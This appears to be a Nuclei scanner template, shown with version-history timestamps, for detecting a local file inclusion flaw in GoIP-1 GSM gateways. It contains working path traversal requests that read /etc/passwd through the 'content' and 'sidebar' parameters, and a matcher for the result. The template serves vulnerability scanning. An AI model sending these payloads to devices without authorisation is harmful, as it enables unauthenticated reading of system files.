2022-02-18 12:33:17 +00:00
id : goip-1-lfi
info :
name : GoIP-1 GSM - Local File Inclusion
author : gy741
severity : high
2022-07-27 20:17:31 +00:00
description : GoIP-1 GSM is vulnerable to local file inclusion because input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
2022-02-18 12:33:17 +00:00
reference :
2022-02-22 06:08:07 +00:00
- https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
- http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
- http://en.dbltek.com/latestfirmwares.html
2022-07-27 20:17:31 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-10-14 11:27:55 +00:00
tags : gsm,goip,lfi,iot
2022-02-18 12:33:17 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-18 12:33:17 +00:00
- method : GET
path :
2022-02-25 11:58:47 +00:00
- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
2022-02-18 12:33:17 +00:00
matchers :
- type : regex
regex :
- "root:.*:0:0:"
2023-10-19 13:13:52 +00:00
# digest: 490a00463044022011a44767df2de06115e8fabe43b7a2cb47e07610bc99123237ea3340aa26154a02204ead916858e913831cc8382afe755df9f87910769a019f46e92b7e0faf4e4245:922c64590222798bb761d5b6d8e72950